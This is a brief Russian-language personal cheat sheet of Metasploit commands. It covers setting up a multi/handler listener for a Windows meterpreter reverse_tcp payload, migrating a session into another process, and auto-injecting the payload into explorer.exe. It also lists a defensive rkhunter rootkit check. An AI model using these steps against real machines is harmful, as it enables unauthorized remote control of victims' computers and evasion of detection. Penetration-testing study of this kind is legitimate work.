Заметки
Sam Sepioljobs -K - завершает все эксплоиты в метасплоит
rkhunter --check - проверить Линукс на руткиты
Запуск слушателя на любой эксплоит
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.12
exploit
Миграция в другой процесс:
ps – список всех текущих процессов
migrate 3404 (номер процесса)
Для того что бы сохранить сессию можно мигрировать в другой процесс:
Отображаются абсолютно все параметры модулей пэйлоад и эесплоит.
show advanced
нас интересуют параметры:
PrependMigrate
PrependMigrateProc
PrependMigrate - активирует автоматическое мигрирование процесса. Чтобы его включить достаточно включить - true.
PrependMigrateProc - содержит имя процесса в который необходимо инжектировать пэйлоад.
Установим перечисленные параметры:
set prependmigrate true
set prependmigrateproc explorer.exe
run
😬